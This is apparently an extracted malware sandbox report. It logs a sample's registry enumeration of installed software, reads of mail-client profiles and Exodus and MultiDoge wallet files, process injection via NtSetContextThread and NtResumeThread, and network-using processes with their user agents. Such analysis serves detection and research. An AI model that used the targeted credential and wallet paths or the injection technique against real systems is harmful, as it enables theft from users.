
    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000598
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          한컴오피스 한글 2010
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000598
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          HttpWatch Professional 9.3.39
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000598
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          한컴오피스 한글 2010
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000598
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Google Update Helper
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000598
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Access MUI (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000598
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Excel MUI (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000598
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office PowerPoint MUI (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000598
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Publisher MUI (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000598
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Outlook MUI (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000598
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Word MUI (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000598
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Proof (English) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000598
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Proof (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x00000598
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office IME (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x000005d4
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Proofing (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x000005d4
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Enterprise 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x000005d4
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office InfoPath MUI (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x000005d4
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Shared MUI (English) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x000005d4
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Shared MUI (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x000005d8
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office OneNote MUI (Korean) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegQueryValueExW

  
  
    
      
    
  


  
    
      key_handle:
      
        
          0x000005d8
        
      
      
      

    
  
    
      regkey_r:
      
        
          DisplayName
        
      
      
      

    
  
    
      reg_type:
      
        
          1
        
      
      
        (REG_SZ)
      
      

    
  
    
      value:
      
        
          Microsoft Office Groove MUI (English) 2007
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Roaming\ICQ\0001
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
                                    
                                


                            

                        

                            

                                

                                    registry
                                    HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                                    
                                


                            

                        

                            

                                

                                    registry
                                    HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                    
                                


                            

                        

                            

                                

                                    registry
                                    HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    
                                        
                                            process
                                            stan.exe
                                        
                                    
                                        
                                            useragent
                                            Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
                                        
                                    
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            process
                                            iexplore.exe
                                        
                                    
                                        
                                            useragent
                                            Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                        
                                    
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            process
                                            explorhe.exe
                                        
                                    
                                        
                                            useragent
                                            
                                        
                                    
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            process
                                            InstallSetup7.exe
                                        
                                    
                                        
                                            useragent
                                            NSIS_Inetc (Mozilla)
                                        
                                    
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            process
                                            rty25.exe
                                        
                                    
                                        
                                            useragent
                                            HTTPREAD
                                        
                                    
                                        
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    Process injection
                                    Process 3228 called NtSetContextThread to modify thread in remote process 4192
                                    
                                


                            

                        

                            

                                

                                    Process injection
                                    Process 4844 called NtSetContextThread to modify thread in remote process 5088
                                    
                                


                            

                        

                            

                                

                                    

                                    
                                        

                                            Time & API
                                            Arguments
                                            Status
                                            Return
                                            Repeated
                                        

                                    

                                

                                

                                    

  
NtSetContextThread

  
  
    
      
    
  


  
    
      
        registers.eip:
        1995571652
        

      
        registers.esp:
        2226600
        

      
        registers.edi:
        0
        

      
        registers.eax:
        4288032
        

      
        registers.ebp:
        0
        

      
        registers.edx:
        0
        

      
        registers.ebx:
        -139264
        

      
        registers.esi:
        0
        

      
        registers.ecx:
        0
        

      
    
  
    
      thread_handle:
      
        
          0x00000298
        
      
      
      

    
  
    
      process_identifier:
      
        
          4192
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtSetContextThread

  
  
    
      
    
  


  
    
      
        registers.eip:
        1995571652
        

      
        registers.esp:
        3734452
        

      
        registers.edi:
        0
        

      
        registers.eax:
        4391566
        

      
        registers.ebp:
        0
        

      
        registers.edx:
        0
        

      
        registers.ebx:
        2130567168
        

      
        registers.esi:
        0
        

      
        registers.ecx:
        0
        

      
    
  
    
      thread_handle:
      
        
          0x00000224
        
      
      
      

    
  
    
      process_identifier:
      
        
          5088
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    
                                        
                                            parent_process
                                            firefox.exe
                                        
                                    
                                        
                                    
                                        
                                            martian_process
                                            "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\f6938b53-4e70-4b9a-9dfb-6214ea4714d7.dmp"
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            parent_process
                                            firefox.exe
                                        
                                    
                                        
                                    
                                        
                                            martian_process
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            parent_process
                                            chrome.exe
                                        
                                    
                                        
                                    
                                        
                                            martian_process
                                            "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1176,12868731222924543524,12663972143895156928,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=FFBC34D29C4FFB0D59428C7CA88DBE18 --mojo-platform-channel-handle=1192 --ignored=" --type=renderer " /prefetch:2
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            parent_process
                                            chrome.exe
                                        
                                    
                                        
                                    
                                        
                                            martian_process
                                            "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2444 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            parent_process
                                            chrome.exe
                                        
                                    
                                        
                                    
                                        
                                            martian_process
                                            "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e9f1e8,0x7fef3e9f1f8,0x7fef3e9f208
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            parent_process
                                            firefox.exe
                                        
                                    
                                        
                                    
                                        
                                            martian_process
                                            "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\ae114d14-d6af-4b01-bdc9-950de0d5db9c.dmp"
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            parent_process
                                            chrome.exe
                                        
                                    
                                        
                                    
                                        
                                            martian_process
                                            "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1148,9833243971878915932,8282251979199750159,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=FEC6E6A7BA5F044C38A9880FE833C883 --mojo-platform-channel-handle=1156 --ignored=" --type=renderer " /prefetch:2
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            parent_process
                                            chrome.exe
                                        
                                    
                                        
                                    
                                        
                                            martian_process
                                            "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1608 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            parent_process
                                            chrome.exe
                                        
                                    
                                        
                                    
                                        
                                            martian_process
                                            "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e9f1e8,0x7fef3e9f1f8,0x7fef3e9f208
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            parent_process
                                            firefox.exe
                                        
                                    
                                        
                                    
                                        
                                            martian_process
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            parent_process
                                            firefox.exe
                                        
                                    
                                        
                                    
                                        
                                            martian_process
                                            "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\d88e0bf0-a961-4b49-a93d-a8743489b9d8.dmp"
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            parent_process
                                            firefox.exe
                                        
                                    
                                        
                                    
                                        
                                            martian_process
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            parent_process
                                            chrome.exe
                                        
                                    
                                        
                                    
                                        
                                            martian_process
                                            "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2000 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            parent_process
                                            chrome.exe
                                        
                                    
                                        
                                    
                                        
                                            martian_process
                                            "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1364,8014233654610286441,10230124045797015840,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=857B1112D202434AF8BCA3768DBBECF3 --mojo-platform-channel-handle=1388 --ignored=" --type=renderer " /prefetch:2
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            parent_process
                                            chrome.exe
                                        
                                    
                                        
                                    
                                        
                                            martian_process
                                            "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e9f1e8,0x7fef3e9f1f8,0x7fef3e9f208
                                        
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    url
                                    http://127.0.0.1
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Roaming\MultiDoge\multidoge.wallet
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\parent.lock
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Local\Temp\firefox\parent.lock
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    Process injection
                                    Process 2960 resumed a thread in remote process 2856
                                    
                                


                            

                        

                            

                                

                                    Process injection
                                    Process 2960 resumed a thread in remote process 1308
                                    
                                


                            

                        

                            

                                

                                    Process injection
                                    Process 2960 resumed a thread in remote process 1156
                                    
                                


                            

                        

                            

                                

                                    Process injection
                                    Process 2960 resumed a thread in remote process 176
                                    
                                


                            

                        

                            

                                

                                    Process injection
                                    Process 2960 resumed a thread in remote process 2208
                                    
                                


                            

                        

                            

                                

                                    Process injection
                                    Process 2960 resumed a thread in remote process 2664
                                    
                                


                            

                        

                            

                                

                                    Process injection
                                    Process 3012 resumed a thread in remote process 604
                                    
                                


                            

                        

                            

                                

                                    Process injection
                                    Process 176 resumed a thread in remote process 2980
                                    
                                


                            

                        

                            

                                

                                    Process injection
                                    Process 2932 resumed a thread in remote process 1308
                                    
                                


                            

                        

                            

                                

                                    Process injection
                                    Process 2208 resumed a thread in remote process 2580
                                    
                                


                            

                        

                            

                                

                                    Process injection
                                    Process 2568 resumed a thread in remote process 1156
                                    
                                


                            

                        

                            

                                

                                    Process injection
                                    Process 884 resumed a thread in remote process 2856
                                    
                                


                            

                        

                            

                                

                                    

                                    
                                        

                                            Time & API
                                            Arguments
                                            Status
                                            Return
                                            Repeated
                                        

                                    

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x000002bc
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          2856
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x000002bc
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          1308
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x00000280
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          1156
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x00000288
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          176
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x00000288
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          2208
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x000002a0
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          2664
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x00000334
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          604
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000044
        
      
      
      

    
  
    
      suspend_count:
      
        
          1
        
      
      
      

    
  
    
      process_identifier:
      
        
          2980
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1308
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtResumeThread

  
  
    
      
    
  


  
    
      thread_handle:
      
        
          0x0000000000000154
        
      
      
      

    
  
    
      suspend_count:
      
        
          2
        
      
      
      

    
  
    
      process_identifier:
      
        
          1308
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


